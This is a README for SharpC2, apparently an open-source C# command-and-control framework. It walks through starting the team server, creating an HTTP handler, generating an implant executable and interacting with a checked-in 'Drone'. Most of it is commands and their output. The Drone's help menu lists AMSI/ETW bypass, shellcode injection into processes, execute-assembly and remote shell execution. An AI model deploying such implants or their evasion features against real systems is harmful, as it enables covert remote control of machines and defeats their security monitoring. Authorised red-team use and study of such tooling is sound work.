SharpC2 is a Command and Control Framework written in C#.
The solution consists of an ASP.NET Core Team Server, a .NET Framework Implant, and a .NET Client.
The quickest way to have a play with the framework is clone the repo, then build and run the Debug versions.
PS C:\Tools\SharpC2> dotnet build
Client -> C:\Tools\SharpC2\Client\bin\Debug\net6.0\SharpC2.dll
TeamServer -> C:\Tools\SharpC2\TeamServer\bin\Debug\net6.0\TeamServer.dll
Build succeeded.
0 Warning(s)
0 Error(s)
Time Elapsed 00:00:01.98
PS C:\Tools\SharpC2> cd .\TeamServer\bin\Debug\net6.0\
PS C:\Tools\SharpC2\TeamServer\bin\Debug\net6.0> dotnet TeamServer.dll -p Passw0rd!
info: Microsoft.Hosting.Lifetime[14]
Now listening on:
info: Microsoft.Hosting.Lifetime[0]
Application started. Press Ctrl+C to shut down.
info: Microsoft.Hosting.Lifetime[0]
Hosting environment: Production
info: Microsoft.Hosting.Lifetime[0]
Content root path: C:\Tools\SharpC2\TeamServer\bin\Debug\net6.0
Note: If the server starts in Development
mode, it will only listen for connections on the localhost
. To ensure it runs in Production
mode (and therefore listen for connections on all interfaces) set the ASPNETCORE_ENVIRONMENT
variable to Production
PS C:\Tools\SharpC2\Client\bin\Debug\net6.0> dotnet SharpC2.dll -s localhost -p 8443 -n rasta -P Passw0rd!
___ _ ___ ___
/ __| |_ __ _ _ _ _ __ / __|_ )
\__ \ ' \/ _` | '_| '_ \ (__ / /
|___/_||_\__,_|_| | .__/\___/___|
Server Certificate
[Serial Number]
[Not Before]
25/02/2021 21:01:43
[Not After]
25/02/2022 21:01:43
accept? [y/N] >
Use the create
command to create a new handler. The usage is: create <name> <type>
. Valid types are HTTP
and SMB
[drones] > handlers
[handlers] > list
No Handlers
[handlers] > create demo-http HTTP
[+] Handler "demo-http" created.
When a handler has been created, you can set its parameters with the set
command. The usage is: set <handler> <parameter> <value>
[handlers] > set demo-http BindPort 8080
[+] BindPort set to 8080
[handlers] > set demo-http ConnectPort 8080
[+] ConnectPort set to 8080
Finally, run the handler with the start
command. The usage is: start <handler>
[handlers] > start demo-http
[+] Handler "demo-http" started.
[handlers] > list
Name Running
---- -------
demo-http True
Use the payload
command to generate a payload for a handler. The usage is: payload <handler> <format> <path>
. Valid formats are: Exe
, Dll
, Raw
& Svc
[drones] > payload demo-http Exe c:\payloads\http-drone.exe
[+] 164352 bytes saved.
Execute the payload, and the Drone should check-in.
[+] Drone fea75efa53 checked in from Daniel@Ghost-Canyon.
[drones] > list
Guid Parent Address Hostname Username Process Pid Integrity Arch LastSeen
---- ------ ------- -------- -------- ------- --- --------- ---- --------
fea75efa53 - Ghost-Canyon Daniel http-drone 17300 Medium x64 18/12/2021 16:11:20
Interact with a Drone via the interact
command. Usage is: interact <guid>
[drones] > interact fea75efa53
[fea75efa53] > help
Name Description
---- -----------
abort Abort a running task
back Go back to the previous screen
bypass Set a directive to bypass AMSI/ETW on tasks
cat Read a file as text
cd Change working directory
execute-assembly Execute a .NET assembly
exit Exit this Drone
getuid Get current identity
help Print a list of commands and their description
link Link to an SMB Drone
load-module Load an external Drone module
ls List filesystem
mkdir Create a directory
overload Map and execute a native DLL
ps List running processes
pwd Print working directory
rm Delete a file
rmdir Delete a directory
run Run a command
services List services on the current or target machine
shell Run a command via cmd.exe
shinject Inject arbitrary shellcode into a process
sleep Set sleep interval and jitter
upload Upload a file to the current working directory of the Drone
[fea75efa53] > getuid
[+] Tasked Drone to run getuid: 3989657f56.
[+] Drone checked in. Sent 176 bytes.
[+] Drone task 3989657f56 is running.
[+] Drone task 3989657f56 has completed.
See more documentation on Read the Docs.